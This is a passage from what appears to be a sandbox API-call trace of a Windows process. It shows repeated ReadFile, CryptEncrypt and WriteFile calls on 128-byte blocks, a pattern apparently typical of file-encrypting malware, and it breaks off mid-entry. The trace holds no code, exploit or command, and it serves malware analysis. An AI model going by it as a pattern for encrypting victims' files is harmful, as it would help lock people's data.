ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.687] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.687] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.687] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.687] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.687] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.687] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.688] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.688] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.688] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.688] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.688] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.688] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.688] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.688] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.688] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.689] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.689] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.689] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.689] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.689] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.689] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.689] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.689] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.689] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.689] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.689] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.689] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.689] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.689] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.689] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.689] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.689] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.689] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.689] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.689] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.689] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.690] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.690] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.690] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.691] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.691] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.691] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.691] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.691] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.691] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.691] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.691] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.691] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.691] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.691] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.691] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.691] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.691] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.691] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.691] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.691] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.691] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.692] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.692] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.692] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, 